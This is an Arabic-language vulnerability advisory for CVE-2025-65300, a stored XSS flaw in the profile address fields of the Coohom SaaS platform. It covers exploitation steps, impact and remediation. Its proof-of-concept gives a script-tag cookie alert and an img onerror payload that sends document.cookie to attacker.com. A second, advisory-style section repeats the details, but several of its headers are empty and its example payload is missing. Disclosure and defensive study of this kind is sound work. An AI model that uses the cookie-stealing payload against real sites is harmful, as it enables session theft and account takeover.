
# توثيق CVE-2025-65300: ثغرة برمجة نصية عبر المواقع (XSS) مخزنة في منصة Coohom SaaS ## نظرة عامة CVE-2025-65300 هي ثغرة **برمجة نصية عبر المواقع (XSS) مخزنة** تم اكتشافها في حقول عنوان الملف الشخصي ضمن إعدادات الحساب في منصة **Coohom SaaS**. تسمح هذه الثغرة للمهاجم بحقن نصوص برمجية خبيثة يتم تخزينها بشكل دائم على الخادم وتنفيذها في متصفح أي مستخدم يعرض الصفحة المتأثرة. ## التفاصيل الفنية - **المكوّن المتأثر**: إعدادات الحساب — حقول عنوان الملف الشخصي - **نوع الثغرة**: Cross-Site Scripting (XSS) مخزنة - **التصنيف**: CWE-79 (عدم التعقيم السليم للمخرجات) - **خطورة الثغرة**: متوسطة إلى عالية ## سيناريو الاستغلال (PoC) يمكن للمهاجم استغلال هذه الثغرة عبر الخطوات التالية: 1. تسجيل الدخول إلى حساب على منصة Coohom. 2. الانتقال إلى إعدادات الحساب ثم قسم العنوان في الملف الشخصي. 3. حقن حمولة خبيثة في أحد حقول العنوان، مثل: ```html <script>alert(document.cookie)</script> ``` أو حمولة أكثر تقدماً لسرقة الجلسات: ```html <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> ``` 4. حفظ التغييرات — يتم تخزين الحمولة في قاعدة البيانات دون تعقيم مناسب. 5. عند قيام أي مستخدم آخر (بما في ذلك المسؤولين) بعرض صفحة الملف الشخصي للحساب المخترق، يتم تنفيذ الحمولة في متصفحه. ## تحليل الأثر - **سرقة الجلسات**: يمكن للمهاجم سرقة ملفات تعريف الارتباط (cookies) الخاصة بالجلسات والاستيلاء على حسابات المستخدمين. - **اختطاف الحساب**: إمكانية تنفيذ إجراءات نيابة عن الضحية مثل تغيير كلمة المرور أو البريد الإلكتروني. - **انتشار البرمجيات الخبيثة**: إعادة توجيه المستخدمين إلى مواقع ضارة أو تنزيل برمجيات خبيثة. - **التأثير على المسؤولين**: إذا قام مسؤول بعرض الصفحة المتأثرة، يمكن للمهاجم تنفيذ إجراءات إدارية أو الوصول إلى بيانات حساسة. - **الاستمرارية**: نظراً لأن الحمولة مخزنة بشكل دائم، يستمر الأثر حتى يتم اكتشاف الحمولة وإزالتها يدوياً. ## التوصيات العلاجية ### للإصلاح الفوري 1. **تعقيم المدخلات**: تطبيق تعقيم صارم على جميع حقول الإدخال، خاصة حقول العنوان، لتصفية أي وسوم HTML أو نصوص برمجية. 2. **ترميز المخرجات**: استخدام ترميز السياق المناسب (مثل HTML entity encoding) عند عرض بيانات المستخدم في الصفحات. 3. **سياسة أمان المحتوى (CSP)**: تفعيل سياسة أمان المحتوى لمنع تنفيذ النصوص البرمجية غير المصرح بها. 4. **تحديث المنصة**: التحقق من توفر تحديثات أمنية من Coohom وتطبيقها فوراً. ### للإصلاح طويل الأمد 1. **مراجعة أمنية شاملة**: إجراء فحص أمني كامل لجميع نقاط الإدخال في المنصة. 2. **اختبار الاختراق الدوري**: تنفيذ اختبارات اختراق منتظمة لاكتشاف ثغرات مشابهة. 3. **تدريب المطورين**: رفع الوعي حول ممارسات البرمجة الآمنة والوقاية من XSS. 4. **آلية الإبلاغ عن الثغرات**: إنشاء برنامج مكافآت للثغرات (Bug Bounty) لتشجيع الباحثين الأمنيين على الإبلاغ المسؤول. ## المراجع - [CVE-2025-65300 على NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-65300) - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
[الوصف]
CVE-2025-65300: ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في منصة Coohom SaaS
تاريخ الإفصاح: 2025-10-28 آخر تحديث: 2025-10-28 المُبلغ: Phisit Pupiw البائع: Coohom CWE: CWE-79 – البرمجة النصية عبر المواقع
[الملخص]
تم تحديد ثغرة تخزين للبرمجة النصية عبر المواقع (XSS) في منصة Coohom SaaS في وحدة إعدادات الحساب → الملف الشخصي → العنوان. يتم عرض الإدخال الذي يقدمه المستخدم والمخزن في حقول المدينة والولاية والبلد/المنطقة مرة أخرى للعميل دون تطهير مناسب أو ترميز إخراج واعي بالسياق. يسمح هذا للمهاجمين بتخزين حمولات JavaScript ضارة يتم تنفيذها كلما تم عرض منطقة الملف الشخصي المتأثرة. تؤثر المشكلة على الإصدار الإنتاجي feVersion=1760060603897 (تم التحقق منه في 2025-10-28).
[تفاصيل الثغرة]
تعرض الواجهة الأمامية بيانات المستخدم مباشرة من "window.SAAS_ENV.userInfo.{city, state, country}" دون تطهير أو هروب، مما يتسبب في XSS مخزنة عند تخزين الحمولات المحقونة في قاعدة البيانات وعرضها لاحقًا في واجهة المستخدم. مثال على حمولة ضارة "" عند إدخال هذه الحمولة في حقل المدينة وحفظها وإعادة تحميل صفحة الملف الشخصي، يتم تنفيذ JavaScript عشوائي في متصفح الضحية.
[المكونات المتأثرة]
الوحدة: إعدادات الحساب → الملف الشخصي → حقول العنوان الحقول: المدينة، الولاية، البلد الإصدار الأمامي المتأثر: feVersion=1760060603897 عنوان الإنتاج: https://www.coohom.com/pub/saas/settings/account
[التأثير]
يمكن للمهاجم القيام بما يلي:
[ناقل الهجوم]
[تسلسل الهجوم]
[إثبات المفهوم (PoC)]
خطوات إعادة الإنتاج
[التوصية]
[المراجع]
[الاعتمادات]
اكتشفه: Phisit Pupiw